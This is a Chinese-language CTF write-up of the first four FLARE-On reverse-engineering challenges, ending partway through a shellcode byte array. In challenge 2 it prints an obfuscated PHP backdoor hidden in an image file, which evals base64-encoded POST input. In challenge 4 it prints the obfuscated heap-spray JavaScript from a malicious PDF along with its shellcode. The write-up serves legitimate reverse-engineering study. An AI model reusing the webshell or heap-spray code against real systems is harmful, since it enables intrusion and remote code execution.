The FLARE On Challenge題解
第一題
這個題目是個 .Net 程式, 讓根據這個程式找出一個郵箱地址, 然後給其發郵件, 它就會回覆你下一個題目.
首先, 這個程式是個64位的自解壓程式, 然後, 解壓出來後是個 .Net 程式.
拖到 ILSpy 中看了看, 沒有發現什麼機關, 答案應該透過函式 btnDecode_Click
獲取, 於是將函式 btnDecode_Click
扣出來, 列印中間變數, 第一步轉換就是結果了, 其郵箱地址為:
[email protected]
附原始碼:
#!c#
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace flare_on_1
{
class Program
{
//private void btnDecode_Click(object sender, EventArgs e)
static void btnDecode_Click()
{
//this.pbRoge.Image = Resources.bob_roge;
//byte[] buffer = Resources.dat_secret;
byte[] buffer = {
0xA1, 0xB5, 0x44, 0x84, 0x14, 0xE4, 0xA1, 0xB5, 0xD4, 0x70, 0xB4, 0x91, 0xB4, 0x70, 0xD4, 0x91,
0xE4, 0xC4, 0x96, 0xF4, 0x54, 0x84, 0xB5, 0xC4, 0x40, 0x64, 0x74, 0x70, 0xA4, 0x64, 0x44
};
string str = "";
for (int i = 0; i < buffer.Length; i++)
{
byte num2 = buffer[i];
str = str + ((char)(((num2 >> 4) | ((num2 << 4) & 240)) ^ 0x29));
}
str = str + "\0";
Console.WriteLine(str);
string str2 = "";
for (int j = 0; j < str.Length; j += 2)
{
str2 = str2 + str[j + 1] + str[j];
}
string str3 = "";
for (int k = 0; k < str2.Length; k++)
{
char ch1 = str2[k];
str3 = str3 + ((char)(((byte)str2[k]) ^ 0x66));
}
//this.lbl_title.Text = str3;
}
static void Main(string[] args)
{
btnDecode_Click();
}
}
}
第二題
提示說站點被黑了, 在 home.html 原始碼中看到這個:
<?php include "img/flare-on.png" ?>
圖片中的PHP程式碼:
#!php
<?php $terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|");$order=array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47);$do_me="";for($i=0;$i<count($order);$i++){$do_me=$do_me.$terms[$order[$i]];}eval($do_me); ?>
將 $do_me
輸出並格式化:
#!php
$_= \'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9\';
$__=\'JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7\';
$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
eval($___($__));
OK, 解析 $___
和 $__
:
#!php
$___ = "base64_decode"
$__ = "$code=base64_decode($_);eval($code);"
按照要求將變數 $_
按照 BASE64 解碼:
#!php
if(isset($_POST["\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D"])) { eval(base64_decode($_POST["\97\49\x31\68\x4F\x54\116\104\x61\116\x44\79\x54\106\97\118\97\53\x63\114\x61\x70\65\84\102\x6C\x61\114\101\x44\65\x53\72\111\x6E\x44\x4F\84\99\x6F\x6D"])); }
字串 \97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D
為: a11DOTthatDOTjava5crapATflareDASHonDOTcom
替換大寫字母:
[email protected]
注意: 是 a11
(數字11) 而不是 all
.
第三題
這個就是傳說中的混淆/免殺/反逆向??? 這個程式在 IDA 中只能看到一個長長的賦值/重寫程式的程式碼. 拖到OD中, 發現程式在執行時不斷的解密/重寫程式, 最終在記憶體中生成郵箱地址並彈窗.
#!bash
0012FD21 42 72 6F 6B 65 6E 42 79 74 65 00 E6 FE 12 00 61 BrokenByte.纊.a
0012FD31 61 61 61 61 61 6E 64 20 69 27 6D 20 73 70 65 6E aaaaand i'm spen
0012FD41 74 00 00 7C FE 12 00 6F 6D 67 20 69 73 20 69 74 t..|?.omg is it
0012FD51 20 61 6C 6D 6F 73 74 20 6F 76 65 72 3F 21 3F 29 almost over?!?)
0012FD61 FE 12 00 C6 FD 12 00 6E 6F 70 61 73 61 75 72 75 ?.訖.nopasauru
0012FD71 73 00 00 84 FD 12 00 9D 24 40 00 90 B2 23 E8 00 s..匌.?@.惒#?
0012FD81 00 00 00 8B 34 24 83 C6 1C B9 DF 01 00 00 83 F9 ...?$兤慣..凒
0012FD91 00 74 07 80 36 66 46 49 EB F4 E9 10 00 00 00 61 .t€6fFI媵?...a
0012FDA1 6E 64 20 73 6F 20 69 74 20 62 65 67 69 6E 73 68 nd so it beginsh
0012FDB1 75 73 00 00 68 73 61 75 72 68 6E 6F 70 61 89 E3 us..hsaurhnopa夈
0012FDC1 E8 00 00 00 00 8B 34 24 83 C6 2D 89 F1 81 C1 8C ?...?$兤-夞伭
0012FDD1 01 00 00 89 D8 83 C0 0A 39 D8 75 05 89 E3 83 C3 ..壺兝.9豼夈兠
0012FDE1 04 39 CE 74 08 8A 13 30 16 43 46 EB EB E9 31 00 9蝨?0CF腚?.
0012FDF1 00 00 67 65 74 20 72 65 61 64 79 20 74 6F 20 67 ..get ready to g
0012FE01 65 74 20 6E 6F 70 27 65 64 20 73 6F 20 64 61 6D et nop'ed so dam
0012FE11 6E 20 68 61 72 64 20 69 6E 20 74 68 65 20 70 61 n hard in the pa
0012FE21 69 6E 74 E8 00 00 00 00 8B 34 24 83 C6 1E B9 38 int?...?$兤?
0012FE31 01 00 00 83 F9 00 7E 0E 81 36 62 4F 6C 47 83 C6 ..凒.~?bOlG兤
0012FE41 04 83 E9 04 EB ED 8D 80 00 00 00 00 8D 80 00 00 冮腠崁....崁..
0012FE51 00 00 90 90 90 90 68 72 3F 21 3F 68 20 6F 76 65 ..悙悙hr?!?h ove
0012FE61 68 6D 6F 73 74 68 74 20 61 6C 68 69 73 20 69 68 hmostht alhis ih
0012FE71 6F 6D 67 20 89 E3 E8 00 00 00 00 8B 34 24 83 C6 omg 夈?...?$兤
0012FE81 2D 89 F1 81 C1 D6 00 00 00 89 D8 83 C0 18 39 D8 -夞伭?..壺兝9
0012FE91 75 05 89 E3 83 C3 04 39 CE 74 08 8A 13 30 16 43 u夈兠9蝨?0C
0012FEA1 46 EB EB E9 1D 00 00 00 73 75 63 68 2E 35 68 33 F腚?...such.5h3
0012FEB1 31 31 30 31 30 31 30 31 40 66 6C 61 72 65 2D 6F [email protected]
0012FEC1 6E 2E 63 6F 6D 68 6E 74 00 00 68 20 73 70 65 68 n.comhnt..h speh
郵箱地址:
[email protected]
第四題
APT攻擊, 透過利用Adobe PDF Reader的JS函式漏洞構造堆噴射執行shellcode...
下面這段JS程式碼就是從這個PDF中提取出來的:
#!javascript
var HdPN = "";
var zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf = "";
var IxTUQnOvHg = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u9ba8%ufe01%uc7c6%ue3c1%u7e24%u437c%ue180%ub115%ub3b2%u4f66%u27b6%u9f3c%u7a4e%u412d%ubbbf%u7705%uf528%u9293%u9990%ua998%u0a47%u14eb%u3d49%u484b%u372f%ub98d%u3478%u0bb4%ud5d2%ue031%u3572%ud610%u6740%u2bbe%u4afd%u041c%u3f97%ufc3a%u7479%u421d%ub7b5%u0c2c%u130d%u25f8%u76b0%u4e79%u7bb1%u0c66%u2dbb%u911c%ua92f%ub82c%u8db0%u0d7e%u3b96%u49d4%ud56b%u03b7%ue1f7%u467d%u77b9%u3d42%u111d%u67e0%u4b92%ueb85%u2471%u9b48%uf902%u4f15%u04ba%ue300%u8727%u9fd6%u4770%u187a%u73e2%ufd1b%u2574%u437c%u4190%u97b6%u1499%u783c%u8337%ub3f8%u7235%u693f%u98f5%u7fbe%u4a75%ub493%ub5a8%u21bf%ufcd0%u3440%u057b%ub2b2%u7c71%u814e%u22e1%u04eb%u884a%u2ce2%u492d%u8d42%u75b3%uf523%u727f%ufc0b%u0197%ud3f7%u90f9%u41be%ua81c%u7d25%ub135%u7978%uf80a%ufd32%u769b%u921d%ubbb4%u77b8%u707e%u4073%u0c7a%ud689%u2491%u1446%u9fba%uc087%u0dd4%u4bb0%ub62f%ue381%u0574%u3fb9%u1b67%u93d5%u8396%u66e0%u47b5%u98b7%u153c%ua934%u3748%u3d27%u4f75%u8cbf%u43e2%ub899%u3873%u7deb%u257a%uf985%ubb8d%u7f91%u9667%ub292%u4879%u4a3c%ud433%u97a9%u377e%ub347%u933d%u0524%u9f3f%ue139%u3571%u23b4%ua8d6%u8814%uf8d1%u4272%u76ba%ufd08%ube41%ub54b%u150d%u4377%u1174%u78e3%ue020%u041c%u40bf%ud510%ub727%u70b1%uf52b%u222f%u4efc%u989b%u901d%ub62c%u4f7c%u342d%u0c66%ub099%u7b49%u787a%u7f7e%u7d73%ub946%ub091%u928d%u90bf%u21b7%ue0f6%u134b%u29f5%u67eb%u2577%ue186%u2a05%u66d6%ua8b9%u1535%u4296%u3498%ub199%ub4ba%ub52c%uf812%u4f93%u7b76%u3079%ubefd%u3f71%u4e40%u7cb3%u2775%ue209%u4324%u0c70%u182d%u02e3%u4af9%ubb47%u41b6%u729f%u9748%ud480%ud528%u749b%u1c3c%ufc84%u497d%u7eb8%ud26b%u1de0%u0d76%u3174%u14eb%u3770%u71a9%u723d%ub246%u2f78%u047f%ub6a9%u1c7b%u3a73%u3ce1%u19be%u34f9%ud500%u037a%ue2f8%ub024%ufd4e%u3d79%u7596%u9b15%u7c49%ub42f%u9f4f%u4799%uc13b%ue3d0%u4014%u903f%u41bf%u4397%ub88d%ub548%u0d77%u4ab2%u2d93%u9267%ub198%ufc1a%ud4b9%ub32c%ubaf5%u690c%u91d6%u04a8%u1dbb%u4666%u2505%u35b7%u3742%u4b27%ufc90%ud233%u30b2%uff64%u5a32%u528b%u8b0c%u1452%u728b%u3328%ub1c9%u3318%u33ff%uacc0%u613c%u027c%u202c%ucfc1%u030d%ue2f8%u81f0%u5bff%u4abc%u8b6a%u105a%u128b%uda75%u538b%u033c%uffd3%u3472%u528b%u0378%u8bd3%u2072%uf303%uc933%uad41%uc303%u3881%u6547%u5074%uf475%u7881%u7204%u636f%u7541%u81eb%u0878%u6464%u6572%ue275%u8b49%u2472%uf303%u8b66%u4e0c%u728b%u031c%u8bf3%u8e14%ud303%u3352%u57ff%u6168%u7972%u6841%u694c%u7262%u4c68%u616f%u5464%uff53%u68d2%u3233%u0101%u8966%u247c%u6802%u7375%u7265%uff54%u68d0%u786f%u0141%udf8b%u5c88%u0324%u6168%u6567%u6842%u654d%u7373%u5054%u54ff%u2c24%u6857%u2144%u2121%u4f68%u4e57%u8b45%ue8dc%u0000%u0000%u148b%u8124%u0b72%ua316%u32fb%u7968%ubece%u8132%u1772%u45ae%u48cf%uc168%ue12b%u812b%u2372%u3610%ud29f%u7168%ufa44%u81ff%u2f72%ua9f7%u0ca9%u8468%ucfe9%u8160%u3b72%u93be%u43a9%ud268%u98a3%u8137%u4772%u8a82%u3b62%uef68%u11a4%u814b%u5372%u47d6%uccc0%ube68%ua469%u81ff%u5f72%ucaa3%u3154%ud468%u65ab%u8b52%u57cc%u5153%u8b57%u89f1%u83f7%u1ec7%ufe39%u0b7d%u3681%u4542%u4645%uc683%ueb04%ufff1%u68d0%u7365%u0173%udf8b%u5c88%u0324%u5068%u6f72%u6863%u7845%u7469%uff54%u2474%uff40%u2454%u5740%ud0ff");
var MPBPtdcBjTlpvyTYkSwgkrWhXL = "";
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA=128;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA>=0;--EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) MPBPtdcBjTlpvyTYkSwgkrWhXL += unescape("%ub32f%u3791");
ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv = MPBPtdcBjTlpvyTYkSwgkrWhXL + IxTUQnOvHg;
OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY = unescape("%ub32f%u3791");
fJWhwERSDZtaZXlhcREfhZjCCVqFAPS = 20;
fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA = fJWhwERSDZtaZXlhcREfhZjCCVqFAPS+ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv.length
while (OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length<fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA) OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY+=OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY;
UohsTktonqUXUXspNrfyqyqDQlcDfbmbywFjyLJiesb = OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.substring(0, fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA);
MOysyGgYplwyZzNdETHwkru = OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.substring(0, OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length-fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA);
while(MOysyGgYplwyZzNdETHwkru.length+fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA < 0x40000) MOysyGgYplwyZzNdETHwkru = MOysyGgYplwyZzNdETHwkru+MOysyGgYplwyZzNdETHwkru+UohsTktonqUXUXspNrfyqyqDQlcDfbmbywFjyLJiesb;
DPwxazRhwbQGu = new Array();
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA=0;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA<100;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA++) DPwxazRhwbQGu[EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA] = MOysyGgYplwyZzNdETHwkru + ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv;
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA=142;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA>=0;--EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += unescape("%ub550%u0166");
bGtvKT = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length + 20
while (zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length < bGtvKT) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf;
Juphd = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, bGtvKT);
QCZabMzxQiD = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length-bGtvKT);
while(QCZabMzxQiD.length+bGtvKT < 0x40000) QCZabMzxQiD = QCZabMzxQiD+QCZabMzxQiD+Juphd;
FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE = new Array();
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA=0;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA<125;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA++) FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE[EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA] = QCZabMzxQiD + zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf;
OK, 變數 IxTUQnOvHg
儲存的就是 shellcode 了, 寫了個python程式, 將該變數的值轉換為16進位制的shellcode, 然後再用C語言寫了個程式, 呼叫這個shellcode, 然後可以用OD除錯. 一步步跟蹤指導呼叫MessageBoxA函式彈出視窗顯示郵箱地址. 然而更簡單的方法是直接分析 shellcode, 將shellcode拖到IDA中, 反彙編, 看彙編程式碼, 發現下面這個地方有這麼多的 push
和 xor
指令, 肯定有貓膩, 之後用OD跟進去除錯一下就好了...
#!bash
0048335E 8B1424 mov edx, dword ptr ss:[esp]
00483361 8172 0B 16A3FB3>xor dword ptr ds:[edx+0xB], 0x32FBA316
00483368 68 6F6D4500 push hello.00456D6F
0048336D 8172 17 AE45CF4>xor dword ptr ds:[edx+0x17], 0x48CF45AE
00483374 68 6F6E2E63 push 0x632E6E6F
00483379 8172 23 10369FD>xor dword ptr ds:[edx+0x23], 0xD29F3610
00483380 68 6172652D push 0x2D657261
00483385 8172 2F F7A9A90>xor dword ptr ds:[edx+0x2F], 0xCA9A9F7
0048338C 68 7340666C push 0x6C664073
00483391 8172 3B BE93A94>xor dword ptr ds:[edx+0x3B], 0x43A993BE
00483398 68 6C303174 push 0x7431306C
0048339D 8172 47 828A623>xor dword ptr ds:[edx+0x47], 0x3B628A82
004833A4 68 6D2E7370 push 0x70732E6D
004833A9 8172 53 D647C0C>xor dword ptr ds:[edx+0x53], 0xCCC047D6
004833B0 68 682E6433 push 0x33642E68
004833B5 8172 5F A3CA543>xor dword ptr ds:[edx+0x5F], 0x3154CAA3
004833BC 68 77613163 push 0x63316177
004833C1 8BCC mov ecx, esp
此時已經可以看到郵箱地址了, 然而也可以 郵箱地址是:
[email protected]
隨後的程式碼是呼叫 MessageBoxA
彈視窗的, 預設情況會將郵箱地址與 0x46454542 異或, 可以直接跳過, 這樣彈窗就可以列印郵箱地址了:
#!bash
004833C3 57 push edi
004833C4 53 push ebx
004833C5 51 push ecx
004833C6 57 push edi
004833C7 8BF1 mov esi, ecx
004833C9 89F7 mov edi, esi
004833CB 83C7 1E add edi, 0x1E
004833CE 39FE cmp esi, edi
004833D0 7D 0B jge short hello.004833DD
004833D2 8136 42454546 xor dword ptr ds:[esi], 0x46454542
004833D8 83C6 04 add esi, 0x4
004833DB ^ EB F1 jmp short hello.004833CE
004833DD FFD0 call eax ; user32.MessageBoxA
附C語言程式碼:
#!c
#include <stdio.h>
unsigned char shellcode[1024] = {
0xF9, 0x72, 0x49, 0x46, 0x25, 0x15, 0x0D, 0x7F, 0x3C, 0x3D, 0x84, 0xE0, 0x2A, 0xD6, 0x39, 0xE1,
0x4A, 0xA8, 0xB9, 0x76, 0x24, 0x98, 0x78, 0x73, 0x71, 0x7D, 0x7F, 0x75, 0x76, 0x20, 0xD4, 0x96,
0x91, 0xBA, 0x70, 0x19, 0xF9, 0xB8, 0x32, 0xE2, 0x7B, 0x46, 0xA8, 0x9B, 0x01, 0xFE, 0xC6, 0xC7,
0xC1, 0xE3, 0x24, 0x7E, 0x7C, 0x43, 0x80, 0xE1, 0x15, 0xB1, 0xB2, 0xB3, 0x66, 0x4F, 0xB6, 0x27,
0x3C, 0x9F, 0x4E, 0x7A, 0x2D, 0x41, 0xBF, 0xBB, 0x05, 0x77, 0x28, 0xF5, 0x93, 0x92, 0x90, 0x99,
0x98, 0xA9, 0x47, 0x0A, 0xEB, 0x14, 0x49, 0x3D, 0x4B, 0x48, 0x2F, 0x37, 0x8D, 0xB9, 0x78, 0x34,
0xB4, 0x0B, 0xD2, 0xD5, 0x31, 0xE0, 0x72, 0x35, 0x10, 0xD6, 0x40, 0x67, 0xBE, 0x2B, 0xFD, 0x4A,
0x1C, 0x04, 0x97, 0x3F, 0x3A, 0xFC, 0x79, 0x74, 0x1D, 0x42, 0xB5, 0xB7, 0x2C, 0x0C, 0x0D, 0x13,
0xF8, 0x25, 0xB0, 0x76, 0x79, 0x4E, 0xB1, 0x7B, 0x66, 0x0C, 0xBB, 0x2D, 0x1C, 0x91, 0x2F, 0xA9,
0x2C, 0xB8, 0xB0, 0x8D, 0x7E, 0x0D, 0x96, 0x3B, 0xD4, 0x49, 0x6B, 0xD5, 0xB7, 0x03, 0xF7, 0xE1,
0x7D, 0x46, 0xB9, 0x77, 0x42, 0x3D, 0x1D, 0x11, 0xE0, 0x67, 0x92, 0x4B, 0x85, 0xEB, 0x71, 0x24,
0x48, 0x9B, 0x02, 0xF9, 0x15, 0x4F, 0xBA, 0x04, 0x00, 0xE3, 0x27, 0x87, 0xD6, 0x9F, 0x70, 0x47,
0x7A, 0x18, 0xE2, 0x73, 0x1B, 0xFD, 0x74, 0x25, 0x7C, 0x43, 0x90, 0x41, 0xB6, 0x97, 0x99, 0x14,
0x3C, 0x78, 0x37, 0x83, 0xF8, 0xB3, 0x35, 0x72, 0x3F, 0x69, 0xF5, 0x98, 0xBE, 0x7F, 0x75, 0x4A,
0x93, 0xB4, 0xA8, 0xB5, 0xBF, 0x21, 0xD0, 0xFC, 0x40, 0x34, 0x7B, 0x05, 0xB2, 0xB2, 0x71, 0x7C,
0x4E, 0x81, 0xE1, 0x22, 0xEB, 0x04, 0x4A, 0x88, 0xE2, 0x2C, 0x2D, 0x49, 0x42, 0x8D, 0xB3, 0x75,
0x23, 0xF5, 0x7F, 0x72, 0x0B, 0xFC, 0x97, 0x01, 0xF7, 0xD3, 0xF9, 0x90, 0xBE, 0x41, 0x1C, 0xA8,
0x25, 0x7D, 0x35, 0xB1, 0x78, 0x79, 0x0A, 0xF8, 0x32, 0xFD, 0x9B, 0x76, 0x1D, 0x92, 0xB4, 0xBB,
0xB8, 0x77, 0x7E, 0x70, 0x73, 0x40, 0x7A, 0x0C, 0x89, 0xD6, 0x91, 0x24, 0x46, 0x14, 0xBA, 0x9F,
0x87, 0xC0, 0xD4, 0x0D, 0xB0, 0x4B, 0x2F, 0xB6, 0x81, 0xE3, 0x74, 0x05, 0xB9, 0x3F, 0x67, 0x1B,
0xD5, 0x93, 0x96, 0x83, 0xE0, 0x66, 0xB5, 0x47, 0xB7, 0x98, 0x3C, 0x15, 0x34, 0xA9, 0x48, 0x37,
0x27, 0x3D, 0x75, 0x4F, 0xBF, 0x8C, 0xE2, 0x43, 0x99, 0xB8, 0x73, 0x38, 0xEB, 0x7D, 0x7A, 0x25,
0x85, 0xF9, 0x8D, 0xBB, 0x91, 0x7F, 0x67, 0x96, 0x92, 0xB2, 0x79, 0x48, 0x3C, 0x4A, 0x33, 0xD4,
0xA9, 0x97, 0x7E, 0x37, 0x47, 0xB3, 0x3D, 0x93, 0x24, 0x05, 0x3F, 0x9F, 0x39, 0xE1, 0x71, 0x35,
0xB4, 0x23, 0xD6, 0xA8, 0x14, 0x88, 0xD1, 0xF8, 0x72, 0x42, 0xBA, 0x76, 0x08, 0xFD, 0x41, 0xBE,
0x4B, 0xB5, 0x0D, 0x15, 0x77, 0x43, 0x74, 0x11, 0xE3, 0x78, 0x20, 0xE0, 0x1C, 0x04, 0xBF, 0x40,
0x10, 0xD5, 0x27, 0xB7, 0xB1, 0x70, 0x2B, 0xF5, 0x2F, 0x22, 0xFC, 0x4E, 0x9B, 0x98, 0x1D, 0x90,
0x2C, 0xB6, 0x7C, 0x4F, 0x2D, 0x34, 0x66, 0x0C, 0x99, 0xB0, 0x49, 0x7B, 0x7A, 0x78, 0x7E, 0x7F,
0x73, 0x7D, 0x46, 0xB9, 0x91, 0xB0, 0x8D, 0x92, 0xBF, 0x90, 0xB7, 0x21, 0xF6, 0xE0, 0x4B, 0x13,
0xF5, 0x29, 0xEB, 0x67, 0x77, 0x25, 0x86, 0xE1, 0x05, 0x2A, 0xD6, 0x66, 0xB9, 0xA8, 0x35, 0x15,
0x96, 0x42, 0x98, 0x34, 0x99, 0xB1, 0xBA, 0xB4, 0x2C, 0xB5, 0x12, 0xF8, 0x93, 0x4F, 0x76, 0x7B,
0x79, 0x30, 0xFD, 0xBE, 0x71, 0x3F, 0x40, 0x4E, 0xB3, 0x7C, 0x75, 0x27, 0x09, 0xE2, 0x24, 0x43,
0x70, 0x0C, 0x2D, 0x18, 0xE3, 0x02, 0xF9, 0x4A, 0x47, 0xBB, 0xB6, 0x41, 0x9F, 0x72, 0x48, 0x97,
0x80, 0xD4, 0x28, 0xD5, 0x9B, 0x74, 0x3C, 0x1C, 0x84, 0xFC, 0x7D, 0x49, 0xB8, 0x7E, 0x6B, 0xD2,
0xE0, 0x1D, 0x76, 0x0D, 0x74, 0x31, 0xEB, 0x14, 0x70, 0x37, 0xA9, 0x71, 0x3D, 0x72, 0x46, 0xB2,
0x78, 0x2F, 0x7F, 0x04, 0xA9, 0xB6, 0x7B, 0x1C, 0x73, 0x3A, 0xE1, 0x3C, 0xBE, 0x19, 0xF9, 0x34,
